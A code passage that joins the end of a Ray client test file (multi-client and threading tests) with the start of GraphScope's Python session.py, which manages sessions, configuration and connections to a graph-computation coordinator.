cli2 = ray.init("ray://localhost:25001", allow_multiple=True)
# TODO better error message.
# Right now, it's EOFError actually
with pytest.raises(Exception):
a = Actor.remote(10)
ray.get(a.double.remote())
with cli1:
a1 = Actor.remote(10)
o1 = a1.double.remote()
assert 20 == ray.get(o1)
with cli2:
a2 = Actor.remote(20)
o2 = a2.double.remote()
assert 40 == ray.get(o2)
with pytest.raises(Exception), cli1:
ray.get(a2.double.remote())
with pytest.raises(Exception), cli1:
ray.get(o2)
with pytest.raises(Exception), cli2:
ray.get(a1.double.remote())
with pytest.raises(Exception), cli2:
ray.get(o1)
@pytest.mark.skipif(
sys.platform == "win32",
reason="PSUtil does not work the same on windows.")
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25001 --port 0"],
indirect=True)
def test_multi_cli_threading(call_ray_start):
import threading
b = threading.Barrier(2)
ret = [None, None]
def get(idx):
cli = ray.init("ray://localhost:25001", allow_multiple=True)
with cli:
a = ray.put(idx)
b.wait()
v = ray.get(a)
assert idx == v
b.wait()
ret[idx] = v
t1 = threading.Thread(target=get, args=(0, ))
t2 = threading.Thread(target=get, args=(1, ))
t1.start()
t2.start()
t1.join()
t2.join()
assert ret == [0, 1]
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import json
import logging
import os
import pickle
import signal
import threading
import time
import uuid
import warnings
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import SignalIgnore
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.graph import Graph
from graphscope.framework.graph import GraphDAGNode
from graphscope.framework.operation import Operation
from graphscope.framework.utils import decode_dataframe
from graphscope.framework.utils import decode_numpy
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryDAGNode
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import graph_def_pb2
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
_session_dict = {}
logger = logging.getLogger("graphscope")
class _FetchHandler(object):
"""Handler for structured fetches.
This class takes care of extracting a sub-DAG as targets for a user-provided structure for fetches,
which can be used for a low level `run` call of grpc_client.
Given the results of the low level run call, this class can also rebuild a result structure matching
the user-provided structure for fetches, but containing the corresponding results.
"""
def __init__(self, dag, fetches):
self._fetches = fetches
self._ops = list()
self._unpack = False
if not isinstance(self._fetches, (list, tuple)):
self._fetches = [self._fetches]
self._unpack = True
for fetch in self._fetches:
if hasattr(fetch, "op"):
fetch = fetch.op
if not isinstance(fetch, Operation):
raise ValueError("Expect a `Operation` in sess run method.")
self._ops.append(fetch)
# extract sub dag
self._sub_dag = dag.extract_subdag_for(self._ops)
if "debug" in os.environ:
logger.info("sub_dag: %s", self._sub_dag)
@property
def targets(self):
return self._sub_dag
def _rebuild_graph(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
if isinstance(self._fetches[seq], Operation):
# for nx Graph
return op_result.graph_def
# get graph dag node as base
graph_dag_node = self._fetches[seq]
# construct graph
g = Graph(graph_dag_node)
# update graph flied from graph_def
g.update_from_graph_def(op_result.graph_def)
return g
def _rebuild_learning_graph(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.learning.graph import Graph as LearningGraph
handle = op_result.handle
handle = json.loads(base64.b64decode(handle).decode("utf-8"))
config = op_result.config.decode("utf-8")
handle["server"] = op_result.result.decode("utf-8")
handle["client_count"] = 1
graph_dag_node = self._fetches[seq]
# construct learning graph
g = LearningGraph(
graph_dag_node, handle, config, op_result.extra_info.decode("utf-8")
)
return g
def _rebuild_interactive_query(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
# get interactive query dag node as base
interactive_query_node = self._fetches[seq]
# construct interactive query
interactive_query = InteractiveQuery(
interactive_query_node,
op_result.result.decode("utf-8"),
op_result.extra_info.decode("utf-8"),
)
interactive_query.status = InteractiveQueryStatus.Running
return interactive_query
def _rebuild_app(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.app import App
# get app dag node as base
app_dag_node = self._fetches[seq]
# construct app
app = App(app_dag_node, op_result.result.decode("utf-8"))
return app
def _rebuild_context(self, seq, op: Operation, op_result: op_def_pb2.OpResult):
from graphscope.framework.context import Context
from graphscope.framework.context import DynamicVertexDataContext
# get context dag node as base
context_dag_node = self._fetches[seq]
ret = json.loads(op_result.result.decode("utf-8"))
context_type = ret["context_type"]
if context_type == "dynamic_vertex_data":
# for nx
return DynamicVertexDataContext(context_dag_node, ret["context_key"])
return Context(context_dag_node, ret["context_key"], ret["context_schema"])
def _rebuild_gremlin_results(
self, seq, op: Operation, op_result: op_def_pb2.OpResult
):
from graphscope.interactive.query import ResultSet
# get result set node as base
result_set_dag_node = self._fetches[seq]
return ResultSet(result_set_dag_node)
def wrap_results(self, response: message_pb2.RunStepResponse):
rets = list()
for seq, op in enumerate(self._ops):
for op_result in response.results:
if op.key == op_result.key:
if op.output_types == types_pb2.RESULTS:
if op.type == types_pb2.RUN_APP:
rets.append(self._rebuild_context(seq, op, op_result))
elif op.type == types_pb2.FETCH_GREMLIN_RESULT:
rets.append(pickle.loads(op_result.result))
else:
# for nx Graph
rets.append(op_result.result.decode("utf-8"))
if op.output_types == types_pb2.GREMLIN_RESULTS:
rets.append(self._rebuild_gremlin_results(seq, op, op_result))
if op.output_types == types_pb2.GRAPH:
rets.append(self._rebuild_graph(seq, op, op_result))
if op.output_types == types_pb2.LEARNING_GRAPH:
rets.append(self._rebuild_learning_graph(seq, op, op_result))
if op.output_types == types_pb2.APP:
rets.append(None)
if op.output_types == types_pb2.BOUND_APP:
rets.append(self._rebuild_app(seq, op, op_result))
if op.output_types in (
types_pb2.VINEYARD_TENSOR,
types_pb2.VINEYARD_DATAFRAME,
):
rets.append(
json.loads(op_result.result.decode("utf-8"))["object_id"]
)
if op.output_types in (types_pb2.TENSOR, types_pb2.DATAFRAME):
if (
op.type == types_pb2.CONTEXT_TO_DATAFRAME
or op.type == types_pb2.GRAPH_TO_DATAFRAME
):
rets.append(decode_dataframe(op_result.result))
if (
op.type == types_pb2.CONTEXT_TO_NUMPY
or op.type == types_pb2.GRAPH_TO_NUMPY
):
rets.append(decode_numpy(op_result.result))
if op.output_types == types_pb2.INTERACTIVE_QUERY:
rets.append(self._rebuild_interactive_query(seq, op, op_result))
if op.output_types == types_pb2.NULL_OUTPUT:
rets.append(None)
break
return rets[0] if self._unpack else rets
def get_dag_for_unload(self):
"""Unload operations (graph, app, context) in dag which are not
existed in fetches.
"""
unload_dag = op_def_pb2.DagDef()
keys_of_fetches = set([op.key for op in self._ops])
mapping = {
types_pb2.CREATE_GRAPH: types_pb2.UNLOAD_GRAPH,
types_pb2.CREATE_APP: types_pb2.UNLOAD_APP,
types_pb2.RUN_APP: types_pb2.UNLOAD_CONTEXT,
}
for op_def in self._sub_dag.op:
if op_def.op in mapping and op_def.key not in keys_of_fetches:
unload_op_def = op_def_pb2.OpDef(
op=mapping[op_def.op], key=uuid.uuid4().hex
)
unload_op_def.parents.extend([op_def.key])
unload_dag.op.extend([unload_op_def])
return unload_dag
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(g, 4)
>>> sess.close()
>>> # or use a session as default
>>> sess = gs.session().as_default()
>>> g = gs.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> sess.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
self,
config=None,
addr=gs_config.addr,
mode=gs_config.mode,
cluster_type=gs_config.cluster_type,
num_workers=gs_config.num_workers,
preemptive=gs_config.preemptive,
k8s_namespace=gs_config.k8s_namespace,
k8s_service_type=gs_config.k8s_service_type,
k8s_gs_image=gs_config.k8s_gs_image,
k8s_etcd_image=gs_config.k8s_etcd_image,
k8s_dataset_image=gs_config.k8s_dataset_image,
k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
k8s_etcd_mem=gs_config.k8s_etcd_mem,
k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
vineyard_shared_mem=gs_config.vineyard_shared_mem,
k8s_engine_cpu=gs_config.k8s_engine_cpu,
k8s_engine_mem=gs_config.k8s_engine_mem,
k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
k8s_mars_worker_mem=gs_config.mars_worker_mem,
k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
k8s_volumes=gs_config.k8s_volumes,
k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
timeout_seconds=gs_config.timeout_seconds,
dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
with_mars=gs_config.with_mars,
mount_dataset=gs_config.mount_dataset,
reconnect=False,
**kw,
):
"""Construct a new GraphScope session.
Args:
config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
For str, it will identify it as a path and read the configuration file to build a
session if file exist. If not specified, the global default configuration
:code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
in environment. Note that it will overwrite explicit parameters. Defaults to None.
addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
A new session id will be generated for each session connection.
mode (str, optional): optional values are eager and lazy. Defaults to eager.
Eager execution is a flexible platform for research and experimentation, it provides:
An intuitive interface: Quickly test on small data.
Easier debugging: Call ops directly to inspect running models and test changes.
Lazy execution means GraphScope does not process the data till it has to. It just gathers all the
information to a DAG that we feed into it, and processes only when we execute :code:`sess.run(fetches)`
cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
same value.
k8s_namespace (str, optional): Contains the namespace to create all resource inside.
If param missing, it will try to read namespace from kubernetes context, or
a random namespace will be created and deleted if namespace not exist.
Defaults to None.
k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
k8s_gs_image (str, optional): The GraphScope engine's image.
k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
k8s_dataset_image(str, optional): The image which mounts aliyun dataset bucket to local path.
k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
a bundled vineyard container otherwise.
k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
k8s_mars_worker_cpu (float, optional):
Minimum number of CPU cores request for mars worker container. Defaults to 0.5.
k8s_mars_worker_mem (str, optional):
Minimum number of memory request for mars worker container. Defaults to '4Gi'.
k8s_mars_scheduler_cpu (float, optional):
Minimum number of CPU cores request for mars scheduler container. Defaults to 0.5.
k8s_mars_scheduler_mem (str, optional):
Minimum number of memory request for mars scheduler container. Defaults to '2Gi'.
with_mars (bool, optional):
Launch graphscope with mars. Defaults to False.
mount_dataset (str, optional):
Create a container and mount aliyun demo dataset bucket to the path specified by `mount_dataset`.
k8s_volumes (dict, optional): A dict of k8s volume which represents a directory containing data, accessible to the
containers in a pod. Defaults to {}.
For example, you can mount host path with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {
"path": "<path>",
"type": "Directory"
},
"mounts": [
{
"mountPath": "<path1>"
},
{
"mountPath": "<path2>"
}
]
}
}
Or you can mount PVC with:
k8s_volumes = {
"my-data": {
"type": "persistentVolumeClaim",
"field": {
"claimName": "your-pvc-name"
},
"mounts": [
{
"mountPath": "<path1>"
}
]
}
}
Also, you can mount a single volume with:
k8s_volumes = {
"my-data": {
"type": "hostPath",
"field": {xxx},
"mounts": {
"mountPath": "<path1>"
}
}
}
timeout_seconds (int, optional): For waiting service ready (or waiting for delete if
k8s_waiting_for_delete is True).
dangling_timeout_seconds (int, optional): After seconds of client disconnect,
coordinator will kill this graphscope instance. Defaults to 600.
Expect this value to be greater than 5 (heartbeat interval).
Disable dangling check by setting -1.
k8s_waiting_for_delete (bool, optional): Waiting for service delete or not. Defaults to False.
**kw (dict, optional): Other optional parameters will be put to :code:`**kw`.
- k8s_minikube_vm_driver: Deprecated.
- k8s_client_config (dict, optional):
Provide configurable parameters for connecting to remote k8s,
which strongly relies on the `kube_config.new_client_from_config` function.
eg: {"config_file": "~/.kube/config", "context": None, "persist_config": True}
config_file: Name of the kube-config file.
context: set the active context. If is set to None, current_context from config file will be used.
persist_config: If True, config file will be updated when changed(e.g GCP token refresh).
- log_level: Deprecated.
Move this param as a global configuration. Set via `graphscope.set_option(log_level='DEBUG')`
- show_log: Deprecated.
Move this param as a global configuration.Set via `graphscope.set_option(show_log=True)`
- k8s_vineyard_shared_mem: Deprecated.
Please use vineyard_shared_mem instead.
reconnect (bool, optional): When connecting to a pre-launched GraphScope cluster with :code:`addr`,
the connect request would be rejected with there is still an existing session connected. There
are cases where the session still exists and user's client has lost connection with the backend,
e.g., in a jupyter notebook. We have a :code:`dangling_timeout_seconds` for it, but a more
deterministic behavior would be better.
If :code:`reconnect` is True, the existing session will be reused. It is the user's responsibility
to ensure there's no such an active client actually.
Defaults to :code:`False`.
- k8s_gie_graph_manager_image: Deprecated.
- k8s_gie_graph_manager_cpu: Deprecated.
- k8s_gie_graph_manager_mem: Deprecated.
- k8s_zookeeper_image: Deprecated.
- k8s_zookeeper_cpu: Deprecated.
- k8s_zookeeper_mem: Deprecated.
Raises:
TypeError: If the given argument combination is invalid and cannot be used to create
a GraphScope session.
"""
self._config_params = {}
self._accessable_params = (
"addr",
"mode",
"cluster_type",
"num_workers",
"preemptive",
"k8s_namespace",
"k8s_service_type",
"k8s_gs_image",
"k8s_etcd_image",
"k8s_image_pull_policy",
"k8s_image_pull_secrets",
"k8s_coordinator_cpu",
"k8s_coordinator_mem",
"k8s_etcd_num_pods",
"k8s_etcd_cpu",
"k8s_etcd_mem",
"k8s_vineyard_daemonset",
"k8s_vineyard_cpu",
"k8s_vineyard_mem",
"vineyard_shared_mem",
"k8s_engine_cpu",
"k8s_engine_mem",
"k8s_mars_worker_cpu",
"k8s_mars_worker_mem",
"k8s_mars_scheduler_cpu",
"k8s_mars_scheduler_mem",
"with_mars",
"reconnect",
"k8s_volumes",
"k8s_waiting_for_delete",
"timeout_seconds",
"dangling_timeout_seconds",
"mount_dataset",
"k8s_dataset_image",
)
self._deprecated_params = (
"show_log",
"log_level",
"k8s_vineyard_shared_mem",
"k8s_gie_graph_manager_image",
"k8s_gie_graph_manager_cpu",
"k8s_gie_graph_manager_mem",
"k8s_zookeeper_image",
"k8s_zookeeper_cpu",
"k8s_zookeeper_mem",
)
saved_locals = locals()
for param in self._accessable_params:
self._config_params[param] = saved_locals[param]
# parse config, which should be a path to config file, or dict
# config has highest priority
if isinstance(config, dict):
self._config_params.update(config)
elif isinstance(config, str):
self._load_config(config, slient=False)
elif DEFAULT_CONFIG_FILE:
self._load_config(DEFAULT_CONFIG_FILE)
# update other optional params
self._config_params.update(kw)
# initial setting of cluster_type
self._cluster_type = self._parse_cluster_type()
# initial dag
self._dag = Dag()
# mars cannot work with run-on-local mode
if self._cluster_type == types_pb2.HOSTS and self._config_params["with_mars"]:
raise NotImplementedError(
"Mars cluster cannot be launched along with local GraphScope deployment"
)
# deprecated params handle
for param in self._deprecated_params:
if param in kw:
warnings.warn(
"The `{0}` parameter has been deprecated and has no effect.".format(
param
),
category=DeprecationWarning,
)
if param == "show_log" or param == "log_level":
warnings.warn(
"Please use `graphscope.set_option({0}={1})` instead".format(
param, kw.pop(param, None)
),
category=DeprecationWarning,
)
if param == "k8s_vineyard_shared_mem":
warnings.warn(
"Please use 'vineyard_shared_mem' instead",
category=DeprecationWarning,
)
kw.pop(param, None)
# update k8s_client_config params
self._config_params["k8s_client_config"] = kw.pop("k8s_client_config", {})
# There should be no more custom keyword arguments.
if kw:
raise ValueError("Value not recognized: ", list(kw.keys()))
if self._config_params["addr"]:
logger.info(
"Connecting graphscope session with address: %s",
self._config_params["addr"],
)
else:
logger.info(
"Initializing graphscope session with parameters: %s",
self._config_params,
)
self._closed = False
# coordinator service endpoint
self._coordinator_endpoint = None
self._launcher = None
self._heartbeat_sending_thread = None
self._grpc_client = None
self._session_id = None # unique identifier across sessions
# engine config:
#
# {
# "experiment": "ON/OFF",
# "vineyard_socket": "...",
# "vineyard_rpc_endpoint": "..."
# }
self._engine_config = None
# interactive instance related graph map
self._interactive_instance_dict = {}
# learning engine related graph map
self._learning_instance_dict = {}
self._default_session = None
atexit.register(self.close)
# create and connect session
with CaptureKeyboardInterrupt(self.close):
self._connect()
self._disconnected = False
# heartbeat
self._heartbeat_interval_seconds = 5
self._heartbeat_sending_thread = threading.Thread(
target=self._send_heartbeat, args=()
)
self._heartbeat_sending_thread.daemon = True
self._heartbeat_sending_thread.start()
# networkx module
self._nx = None
def __repr__(self):
return str(self.info)
def __str__(self):
return repr(self)
@property
def session_id(self):
return self._session_id
@property
def dag(self):
return self._dag
def _load_config(self, path, slient=True):
config_path = os.path.expandvars(os.path.expanduser(path))
try:
with open(config_path, "r") as f:
data = json.load(f)
self._config_params.update(data)
except Exception as exp: # noqa
if not slient:
raise exp
def _parse_cluster_type(self):
# get the cluster type after connecting
cluster_type = types_pb2.UNDEFINED
if self._config_params["addr"] is None:
if self._config_params["cluster_type"] == "hosts":
self._run_on_local()
cluster_type = types_pb2.HOSTS
elif self._config_params["cluster_type"] == "k8s":
cluster_type = types_pb2.K8S
else:
raise ValueError("Expect hosts or k8s of cluster_type parameter")
return cluster_type
@property
def engine_config(self):
"""Show the engine configration associated with session in json format."""
return self._engine_config
@property
def info(self):
"""Show all resources info associated with session in json format."""
info = {}
if self._closed:
info["status"] = "closed"
elif self._grpc_client is None or self._disconnected:
info["status"] = "disconnected"
else:
info["status"] = "active"
if self._cluster_type == types_pb2.K8S:
info["type"] = "k8s"
info["engine_hosts"] = ",".join(self._pod_name_list)
info["namespace"] = self._config_params["k8s_namespace"]
else:
info["type"] = "hosts"
info["engine_hosts"] = self._engine_config["engine_hosts"]
info["cluster_type"] = str(self._cluster_type)
info["session_id"] = self.session_id
info["num_workers"] = self._config_params["num_workers"]
info["coordinator_endpoint"] = self._coordinator_endpoint
info["engine_config"] = self._engine_config
return info
@property
def closed(self):
return self._closed
def eager(self):
return self._config_params["mode"] == "eager"
def _send_heartbeat(self):
while not self._closed:
if self._grpc_client:
try:
self._grpc_client.send_heartbeat()
except Exception as exc:
logger.warning(exc)
self._disconnected = True
else:
self._disconnected = False
time.sleep(self._heartbeat_interval_seconds)
def close(self):
"""Closes this session.
This method frees all resources associated with the session.
Note that closing will ignore SIGINT and SIGTERM signal and recover later.
"""
with SignalIgnore([signal.SIGINT, signal.SIGTERM]):
self._close()
def _close(self):
if self._closed:
return
time.sleep(5)
self._closed = True
self._coordinator_endpoint = None
self._deregister_default()
if self._heartbeat_sending_thread:
self._heartbeat_sending_thread.join(
timeout=self._heartbeat_interval_seconds
)
self._heartbeat_sending_thread = None
self._disconnected = True
# close all interactive instances
for instance in self._interactive_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._interactive_instance_dict.clear()
# close all learning instances
for instance in self._learning_instance_dict.values():
try:
if instance is not None:
instance.close()
except Exception:
pass
self._learning_instance_dict.clear()
if self._grpc_client:
try:
self._grpc_client.close()
except Exception:
pass
self._grpc_client = None
_session_dict.pop(self._session_id, None)
# clean up
if self._config_params["addr"] is None:
try:
if self._launcher:
self._launcher.stop()
except Exception:
pass
self._pod_name_list = []
def _close_interactive_instance(self, instance):
"""Close a interactive instance."""
if self.eager():
self._interactive_instance_dict[instance.object_id] = None
def _close_learning_instance(self, instance):
"""Close a learning instance."""
if self.eager():
self._learning_instance_dict[instance.object_id] = None
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
def _check_closed(self, msg=None):
"""Internal: raise a ValueError if session is closed"""
if self.closed:
raise ValueError(msg or "Operation on closed session.")
# Context manager
def __enter__(self):
"""Context management protocol.
Returns self and register self as default session.
"""
self._check_closed()
self.as_default()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
"""Deregister self from the default session,
close the session and release the resources, ignore all exceptions in close().
"""
try:
self._deregister_default()
self.close()
except Exception:
pass
def as_default(self):
"""Obtain a context manager that make this object as default session.
This method is used when a Session is constructed, which will immediately
install self as a default session.
Raises:
ValueError: If default session exist in current context.
Returns:
A context manager using this session as the default session.
"""
if not _default_session_stack.is_cleared():
raise ValueError(
"A default session is already active. You must explicitly call Session.close()."
)
# session context manager
self._default_session = default_session(self)
self._default_session.__enter__()
def _deregister_default(self):
"""Remove self from the default session stack."""
if self._default_session:
self._default_session.__exit__(None, None, None)
self._default_session = None
def _wrapper(self, dag_node):
if self.eager():
return self.run(dag_node)
return dag_node
def run(self, fetches, debug=False):
"""Run operations of `fetch`.
Args:
fetch: :class:`Operation`
Raises:
RuntimeError:
Client disconnect to the service. Or run on a closed session.
ValueError:
If fetch is not a instance of :class:`Operation`. Or
the fetch has been evaluated.
InvalidArgumentError:
Not recognized on output type.
Returns:
Different values for different output types of :class:`Operation`
"""
if self._closed:
raise RuntimeError("Attempted to use a closed Session.")
if not self._grpc_client:
raise RuntimeError("Session disconnected.")
fetch_handler = _FetchHandler(self.dag, fetches)
try:
response = self._grpc_client.run(fetch_handler.targets)
except FatalError:
self.close()
raise
if not self.eager():
# Unload operations that cannot be touched anymore
dag_to_unload = fetch_handler.get_dag_for_unload()
try:
self._grpc_client.run(dag_to_unload)
except FatalError:
self.close()
raise
return fetch_handler.wrap_results(response)
def _connect(self):
if self._config_params["addr"] is not None:
# try connect to exist coordinator
self._coordinator_endpoint = self._config_params["addr"]
elif self._cluster_type == types_pb2.K8S:
if (
self._config_params["k8s_etcd_image"] is None
or self._config_params["k8s_gs_image"] is None
):
raise K8sError("None image found.")
if isinstance(
self._config_params["k8s_client_config"],
kube_client.api_client.ApiClient,
):
api_client = self._config_params["k8s_client_config"]
else:
try:
api_client = kube_config.new_client_from_config(
**self._config_params["k8s_client_config"]
)
except kube_config.ConfigException as e:
raise RuntimeError(
"Kubernetes environment not found, you may want to"
' launch session locally with param cluster_type="hosts"'
) from e
self._launcher = KubernetesClusterLauncher(
api_client=api_client,
**self._config_params,
)
elif (
self._cluster_type == types_pb2.HOSTS
and isinstance(self._config_params["hosts"], list)
and len(self._config_params["hosts"]) != 0
and self._config_params["num_workers"] > 0
):
# lanuch coordinator with hosts
self._launcher = HostsClusterLauncher(
**self._config_params,
)
else:
raise RuntimeError(
f"Unrecognized cluster type {types_pb2.ClusterType.Name(self._cluster_type)}."
)
# launching graphscope service
if self._launcher is not None:
self._launcher.start()
self._coordinator_endpoint = self._launcher.coordinator_endpoint
# waiting service ready
self._grpc_client = GRPCClient(
self._launcher, self._coordinator_endpoint, self._config_params["reconnect"]
)
self._grpc_client.waiting_service_ready(
timeout_seconds=self._config_params["timeout_seconds"],
)
# connect and fetch logs from rpc server
try:
(
self._session_id,
self._cluster_type,
self._engine_config,
self._pod_name_list,
self._config_params["num_workers"],
self._config_params["k8s_namespace"],
) = self._grpc_client.connect(
cleanup_instance=not bool(self._config_params["addr"]),
dangling_timeout_seconds=self._config_params[
"dangling_timeout_seconds"
],
)
# fetch logs
if self._config_params["addr"] or self._cluster_type == types_pb2.K8S:
self._grpc_client.fetch_logs()
_session_dict[self._session_id] = self
except Exception:
self.close()
raise
def get_config(self):
"""Get configuration of the session."""
return self._config_params
def g(self, incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return self._wrapper(
GraphDAGNode(self, incoming_data, oid_type, directed, generate_eid)
)
def load_from(self, *args, **kwargs):
"""Load a graph within the session.
See more information in :meth:`graphscope.load_from`.
"""
with default_session(self):
return graphscope.load_from(*args, **kwargs)
def _run_on_local(self):
self._config_params["hosts"] = ["localhost"]
self._config_params["port"] = None
self._config_params["vineyard_socket"] = ""
@set_defaults(gs_config)
def gremlin(self, graph, engine_params=None):
"""Get a interactive engine handler to execute gremlin queries.
It will return a instance of :class:`graphscope.interactive.query.InteractiveQueryDAGNode`,
that will be evaluated by :method:`sess.run` in eager mode.
Note that this method will be executed implicitly in eager mode when a property graph created
and cache a instance of InteractiveQuery in session if `initializing_interactive_engine` is True.
If you want to create a new instance under the same graph by different params, you should close
the instance first.
.. code:: python
>>> # close and recreate InteractiveQuery in eager mode.
>>> interactive_query = sess.gremlin(g)
>>> interactive_query.close()
>>> interactive_query = sess.gremlin(g, engine_params={"xxx":"xxx"})
Args:
graph (:class:`graphscope.framework.graph.GraphDAGNode`):
The graph to create interactive instance.
engine_params (dict, optional): Configure startup parameters of interactive engine.
You can also configure this param by `graphscope.set_option(engine_params={})`.
See a list of configurable keys in
`interactive_engine/deploy/docker/dockerfile/executor.vineyard.properties`
Raises:
InvalidArgumentError:
- :code:`graph` is not a property graph.
- :code:`graph` is unloaded in eager mode.
Returns:
:class:`graphscope.interactive.query.InteractiveQueryDAGNode`:
InteractiveQuery to execute gremlin queries, evaluated in eager mode.
"""
if self._session_id != graph.session_id:
raise RuntimeError(
"Failed to create interactive engine on the graph with different session: {0} vs {1}".format(
self._session_id, graph.session_id
)
)
# Interactive query instance won't add to self._interactive_instance_dict in lazy mode.
# self._interactive_instance_dict[graph.vineyard_id] will be None if InteractiveQuery closed
if (
self.eager()
and graph.vineyard_id in self._interactive_instance_dict
and self._interactive_instance_dict[graph.vineyard_id] is not None
):
interactive_query = self._interactive_instance_dict[graph.vineyard_id]
if interactive_query.status == InteractiveQueryStatus.Running:
return interactive_query
